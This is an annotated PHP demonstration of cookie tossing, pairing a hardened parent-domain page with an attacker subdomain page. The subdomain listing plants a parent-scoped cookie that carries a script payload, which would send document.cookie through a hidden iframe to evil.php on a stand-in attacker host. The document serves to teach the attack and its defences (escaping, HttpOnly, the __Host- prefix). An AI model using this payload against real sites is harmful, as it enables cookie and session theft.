Cookie Tossing Example

A simple demonstration of cookie tossing: a page on a subdomain sets cookies scoped to the parent domain (Domain=example.com), so the browser also sends them to the parent-domain page, where they can shadow the values that page set for itself. The parent-domain listing deliberately prints what it receives; the subdomain listing is the attacker side.

Parent Domain

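<?php
// Parent-domain page (www.example.com) of the cookie-tossing demo.
//
// It prints the cookies the browser sent and (re)sets its own three cookies.
// The point of the demo: a page on any other host under example.com can set
// cookie1 / cookie2 with Domain=example.com, and the browser sends those to
// this host as well -- so the values printed below may be attacker-chosen
// even though this very script set "OriginalCookie1"/"OriginalCookie2".
//
// Changes from the original listing:
//   * Set-Cookie headers are sent BEFORE any output. setcookie() after echo
//     fails with "headers already sent" unless output buffering happens to
//     be enabled. $_COOKIE reflects the incoming request, so the printed
//     values are unaffected by the reordering.
//   * Cookie values are HTML-escaped on output. The original echoed them raw,
//     so a tossed cookie carrying <script> was a reflected-XSS sink -- that
//     is the stage of the demo in which a subdomain steals cookie_secret.
//     The overwritten cookie1/cookie2 values are still visible here.
//   * cookie_secret is HttpOnly, so an injected script cannot read it via
//     document.cookie. Neither change stops the tossing itself; only a cookie
//     the browser will not accept from a subdomain does that (the __Host-
//     prefix: Secure, no Domain attribute, Path=/ -- which needs HTTPS).

$expires = time() + 3600 * 24;

// Domain=example.com: shared with every host under example.com, so any
// subdomain can also overwrite it.
setcookie('cookie1', 'OriginalCookie1', $expires, '/', 'example.com');
// No Domain attribute: host-only cookie for this host. A subdomain can still
// plant a second cookie2 with Domain=example.com that the browser sends along
// with it.
setcookie('cookie2', 'OriginalCookie2', $expires);
// HttpOnly (7th argument). Pass true for the 6th (secure) argument as well
// once the demo runs over HTTPS.
setcookie('cookie_secret', 'This is the password', $expires, '/', 'www.example.com', false, true);

// Output labels, in the order the original printed them.
$labels = [
    'cookie1'       => 'Cookie1',
    'cookie2'       => 'Cookie2',
    'cookie_secret' => 'Cookie secret',
];
foreach ($labels as $name => $label) {
    if (!isset($_COOKIE[$name])) {
        continue;
    }
    // When the browser sends two cookies with the same name (the legitimate
    // one and a tossed one), PHP exposes only one of them in $_COOKIE -- the
    // first in the Cookie header, in current PHP versions (verify for yours).
    // Browsers order by longest Path first, then by creation time, which is
    // the ordering a tosser exploits.
    echo $label . ': ' . htmlspecialchars($_COOKIE[$name], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '<br/>';
}
?>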

Subdomain

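<?php
// Subdomain page (e.g. ctoss.example.com) -- the "tosser" of the demo.
//
// It shows which cookies it received, then plants two cookies scoped to the
// parent domain so that www.example.com receives them on its next request:
//   * cookie2 from PHP (Set-Cookie header), carrying an HTML/JS payload;
//   * cookie1 from client-side JavaScript via document.cookie.
//
// Change from the original listing: the Set-Cookie header is sent before any
// output. setcookie() after echo fails with "headers already sent" unless
// output buffering happens to be enabled; $_COOKIE reflects the incoming
// request, so what is printed is unaffected.
//
// NOTE(review): whether the parent page prints the tossed cookie2 instead of
// its own depends on which same-named cookie the browser sends first (longer
// Path first, then the older cookie -- RFC 6265 section 5.4) and on PHP
// keeping only the first. With Path=/ on both, the tossed one wins only when
// it is older; real attacks use a Path more specific than the victim cookie's
// (e.g. the target script's path) so the tossed cookie is ordered first
// regardless of age.

// Payload tossed as cookie2. If the parent page echoes the cookie unescaped,
// this runs on www.example.com and ships document.cookie (cookie_secret
// included unless it is HttpOnly) to evil.php on this host inside a hidden
// iframe. setcookie() URL-encodes the value, so quotes and semicolons survive
// the Set-Cookie header.
$payload = <<<'PAYLOAD'
Evil_Cookie<script>document.write("<iframe src='http://ctoss.example.com/evil.php?cookie="+escape(document.cookie)+"' style='display:none'></iframe>");</script>
PAYLOAD;

// Domain=example.com makes the browser send it to www.example.com as well.
// Ten-minute lifetime, as in the original demo.
setcookie('cookie2', $payload, time() + 600, '/', 'example.com');

// urlencode() is what the original used for output escaping; it is XSS-safe
// here (every <, >, ", ' is percent-encoded) although htmlspecialchars() is
// the usual choice for an HTML body. Kept so the displayed text is unchanged.
foreach (['cookie1' => 'Cookie1', 'cookie2' => 'Cookie2'] as $name => $label) {
    if (isset($_COOKIE[$name])) {
        echo $label, ': ', urlencode($_COOKIE[$name]), '<br/>';
    }
}
// cookie_secret is scoped to www.example.com, so it normally never reaches
// this host -- hence the payload above has to read it on the parent page.
if (isset($_COOKIE['cookie_secret'])) {
    echo 'Cookie_secret: ', urlencode($_COOKIE['cookie_secret']), '<br/>';
} else {
    echo 'No secret cookie found.<br/>';
}
?>
<script>document.cookie = "cookie1=changedbyJavaScript; Path=/; Domain=.example.com"</script>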